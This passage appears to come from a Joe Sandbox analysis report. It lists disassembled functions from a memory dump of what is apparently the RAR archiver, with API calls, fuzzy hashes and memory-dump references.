                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                        • String ID: %u.%03u
                                                                                                                                                                                                                                        • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                        • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                        • Instruction ID: 5a48b5e9f4e9d639b2b4f5ce51e72ea759eb1a1731c95f78590dbddcf52ce1e7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A315C25619581E1E7169B24E4113BA6261BB847B4F501337ED7E877E1DE3CE90BC300
                                                                                                                                                                                                                                        Function 00007FF6AA1E7854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                        • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                        • Instruction ID: 720b22193ae009278045c30a26537c9237d194f60d3a3b6ef0584b8f638a5f1a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9341C522B1AA81D6EB618F15E8447B9B7A1FB98794F444036EE4DC7B84DF3CD842C700
                                                                                                                                                                                                                                        Function 00007FF6AA1DD7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                        • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                        • Instruction ID: ccc7d6d6e598f32a18285371c344a314589b74d01b0408550003e47a9b3b2bcb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C215E7A60A641D2E632DB15E04066EB7A1FB84BA5F011677DE9D83B95CF3CE842CB00
                                                                                                                                                                                                                                        Function 00007FF6AA1B42CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: wcschr$swprintf
                                                                                                                                                                                                                                        • String ID: %c:\
                                                                                                                                                                                                                                        • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                                        • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                        • Instruction ID: 748b10e6c10ccb1e2d278169323660316e02d6c1be11c916dc3a48a0c1ae981c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF118112B19791E1EE259F11D50106D6270AF45B90B588676CF6D937E6DF3CEC638204
                                                                                                                                                                                                                                        Function 00007FF6AA1CB780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                                        • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                                        • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                                        • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                        • Instruction ID: da4c0894eec0fca34ce90e56a1aba648c309dc219de8f0886d3651c73e745b7a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B511E132B16681C6FB418F22E4403AE32A2EBC4B48F0C803ACA4D87259DF3E98578750
                                                                                                                                                                                                                                        Function 00007FF6AA1D2984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 904936192-0
                                                                                                                                                                                                                                        • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                        • Instruction ID: ae738236f764461f909e8d718fbd6ba0d35205b2b83719cd3003d4a5a1a70d3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1451D172A1AA81D1EB51CF25D4503AC73A1FB84B94F048236DEAE8B794DF7DD912C300
                                                                                                                                                                                                                                        Function 00007FF6AA1A3818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D), ref: 00007FF6AA1A38CD
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D,?,?,00000000), ref: 00007FF6AA1A391F
                                                                                                                                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D,?,?,00000000), ref: 00007FF6AA1A399B
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00007FF6AA19F6FC,00000000,?,?,?,?,00007FF6AA1A097D,?,?,00000000), ref: 00007FF6AA1A39A6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2287278272-0
                                                                                                                                                                                                                                        • Opcode ID: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                        • Instruction ID: 19e49ce783149e26f03bae8924fc19d2a299cfa89dc20dc72e2c2e821f390fbe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b21d4b4015e45ce14e3c1bb02d2562928349115458abc9ea3e67fc953cea0f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F41D63AB0E641A2EA528B21A41177A67A2BF817E4F504376ED9D877D4DF7CDC0B8700
                                                                                                                                                                                                                                        Function 00007FF6AA1D0244 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 932687459-0
                                                                                                                                                                                                                                        • Opcode ID: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                        • Instruction ID: 9e73981dcab743ddcaa67450522e6dce2dbeb1178c58adb1d3b7824bbf3c475f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 448d9fab3f4c26286063d0fff6a0c35ae409658baa3bfeb12eeb43ee41abd505
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A418362A0EAC2E9EB929A21D1503BD23D0EF40B84F184577DB4E86699DF2CED47C354
                                                                                                                                                                                                                                        Function 00007FF6AA1E5120 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4141327611-0
                                                                                                                                                                                                                                        • Opcode ID: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                        • Instruction ID: 095ae23581577b5598825be6c6a26e1d32ebe111277dcb9629720dc337986d00
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7bd9680fa6b4193e921ea7abc60155107c03bf2766982dd05110af1441b6c30
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB418721A0E742D6FB779B54D040379A6A2AF42BA8F14417ADA4986ED5DF3DDC438700
                                                                                                                                                                                                                                        Function 00007FF6AA19D048 Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D09D
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D0E5
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D114
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,00007FF6AA1886CB,?,?,?,00007FF6AA18A5CB,?,?,00000000,?,?,00000040,?,?,00007FF6AA182DF9), ref: 00007FF6AA19D15C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                        • Opcode ID: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                        • Instruction ID: 09725c9df7fe4f367c8fafa99eab74573568e3d13a09aaf32558b0de764f5d96
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c41f03ffe9be2f80d80ab2a91f405bd887f89bc1d7d9ea25aa0d2314948d83b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60317332619B8582E7608F11F55476A77A0F789BB8F50432AEAAD47BC8CF3CD805CB00
                                                                                                                                                                                                                                        Function 00007FF6AA1CB4EC Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
